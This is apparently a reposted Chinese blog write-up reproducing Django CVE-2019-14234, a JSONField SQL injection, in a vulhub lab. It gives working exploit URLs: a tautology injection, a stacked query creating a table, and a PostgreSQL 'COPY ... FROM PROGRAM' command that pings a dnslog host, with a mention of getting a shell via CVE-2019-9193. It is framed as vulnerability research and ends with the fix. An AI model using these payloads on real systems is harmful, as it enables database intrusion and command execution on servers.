当前位置: 首页 > news >正文

检测到目标url存在框架注入漏洞_CVE201914234:Django JSONField SQL注入漏洞复现

本公众号专注于最新漏洞复现,欢迎关注!

----------------------------------------------------------------------------------------

本文作者:OneZero耀灵(Timeline Sec新成员)

本文共1112字,阅读大约需要3~4分钟

声明:请勿做非法用途,否则后果自负

0x00 简介


Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。

0x01 漏洞概述


该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。

Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。

4e4a9754c2ffae275a3f78ad25ebd028.png

通过JSONField类获得KeyTransform类并生成sql语句的位置。

其中key_name是可控的字符串,最终生成的语句是WHERE (field->'[key_name]') = 'value',因此可以进行SQL注入。

0x02 影响版本


Django

1.11.x before 1.11.23

2.1.x before 2.1.11

2.2.x before 2.2.4

0x03 环境搭建


在线环境:

转发本文至朋友圈并截图发至公众号内

自行搭建:

直接使用vulhub的docker环境搭建

git clone https://github.com/vulhub/vulhub.gitcd vulhub/django/CVE-2019-14234/docker-compose up -d

访问http://ip:8000可以正常访问说明搭建成功

5dc0ebbcfc6ca2e4d490ae3b37f44329.png

0x04 漏洞利用


通过对代码的分析,可以知道如果在你的Django中使用了JSONField并且查询的“键名”可控,就可以进行SQL注入

访问http://ip:8000/admin

输入用户名admin ,密码a123123123

13d3497b6445383b03b28db054b17b42.png

然后访问

http://ip:8000/admin/vuln/collection/

1d842214063663f74c2bf011b610d83d.png

然后构造URL进行查询

http://ip:8000/admin/vuln/collection/?detail__a%27b=123

e2bb34fdf97e41e03e0c396ff5d9c565.png

可以看到已经注入成功,并且可以看到构造的SQL语句

为进一步验证注入语句,我们继续构造

http://ip:8000/admin/vuln/collection/?detail__title')='1' or 1=1--

后台生成的sql语句的关键部分是

WHERE ("vuln_collection"."detail" -> 'title')='1' or 1=1-- ') = %s

由于or 1=1永为真,因此应该返回所有结果,页面返回结果符合预期,如下图

83c587a50f92967e67ea71b6c944fbdc.png

下一步结合CVE-2019-9193我们尝试进行命令注入,构造url如下

http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20

页面结果虽然报错,但是报错原因是no results to fetch,说明我们的语句已经执行

97d80c4bbd8cf64b493939140ec0a06a.png

然后用dnslog检测是否可以执行命令

http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping c2pn4v.dnslog.cn'--%20

成功检测到流量

f3f8a8ae257f1f9f1e1f337872f567b3.png

复现环境里的postgresql数据库docker没对外的端口映射,如果开了或者真实环境里,还可以结合msf通过CVE-2019-9193来getshell

0x05 修复方式


官网已发布修复,更新至最新版即可

02d088f112ace6c926080ef76ced3c68.png 4977c48e3a89f673ee69f4238e4194c1.png悄悄点 在看,技术变精湛!

相关文章:

  • 随机森林的特征 是放回抽样么_机器学习军火库 | 浪漫算法 随机森林
  • java空字符_Java学习之路008天
  • py怎么运行_Mac Tensorflow Faster R-CNN CPU实现环境配置及Demo运行
  • 一个数等于两个不同素数的乘机_【朝夕的ACM笔记】数论-反素数
  • spring是什么_Spring 源码第三弹!EntityResolver 是个什么鬼?
  • python界面开发webview_Python使用Pyqt5实现简易浏览器!非常实用!
  • 程序实例python_Python花式编程案例集锦(5)
  • python装饰器作用和功能_Python装饰器实现类Java注解功能
  • 树莓派无屏幕安装kali_树莓派制作魔镜屏幕旋转不正确的处理方法
  • 没有与参数列表匹配的重载函数_C++覆盖和重载的区别
  • python嵌入式系统开发_python能开发单片机吗
  • python根据excel生成报表_python提取Excel中的特定列生成新的表格
  • python显示数据长度_python 读取数据再写入,文件大小总会出现变差?
  • datagrid如何获取一行数据中的某个字段值_UI测试中,我们应该注意哪些?
  • python常考题_python 一个批量出考题,生成不同考卷的小例题
  • Druid 在有赞的实践
  • Idea+maven+scala构建包并在spark on yarn 运行
  • IOS评论框不贴底(ios12新bug)
  • Java多态
  • PHP的类修饰符与访问修饰符
  • 猴子数据域名防封接口降低小说被封的风险
  • 世界上最简单的无等待算法(getAndIncrement)
  • 系统认识JavaScript正则表达式
  • 看到一个关于网页设计的文章分享过来!大家看看!
  • $redis-setphp_redis Set命令,php操作Redis Set函数介绍
  • (13):Silverlight 2 数据与通信之WebRequest
  • (4)事件处理——(6)给.ready()回调函数传递一个参数(Passing an argument to the .ready() callback)...
  • (八)五种元启发算法(DBO、LO、SWO、COA、LSO、KOA、GRO)求解无人机路径规划MATLAB
  • (三十五)大数据实战——Superset可视化平台搭建
  • (转)大道至简,职场上做人做事做管理
  • .jks文件(JAVA KeyStore)
  • .NET Framework与.NET Framework SDK有什么不同?
  • .NET HttpWebRequest、WebClient、HttpClient
  • .Net Memory Profiler的使用举例
  • .NET 分布式技术比较
  • .NET 应用架构指导 V2 学习笔记(一) 软件架构的关键原则
  • .Net转Java自学之路—SpringMVC框架篇六(异常处理)
  • /usr/local/nginx/logs/nginx.pid failed (2: No such file or directory)
  • []sim300 GPRS数据收发程序
  • []常用AT命令解释()
  • [20150904]exp slow.txt
  • [C#]winform部署yolov5-onnx模型
  • [C#]winform制作仪表盘好用的表盘控件和使用方法
  • [CERC2017]Cumulative Code
  • [Electron]ipcMain.on和ipcMain.handle的区别
  • [GN] 后端接口已经写好 初次布局前端需要的操作(例)
  • [GYCTF2020]Ez_Express
  • [HarekazeCTF2019]encode_and_encode 不会编程的崽
  • [Hive] 常见函数
  • [IE9] IE9 beta版下载链接
  • [Java]深入剖析常见排序
  • [javaSE] GUI(事件监听机制)
  • [JavaWeb]—前端篇
  • [Kubernetes]4. 借助腾讯云TKE快速创建Pod、Deployment、Service部署k8s项目
  • [LOJ161] 仙人掌计数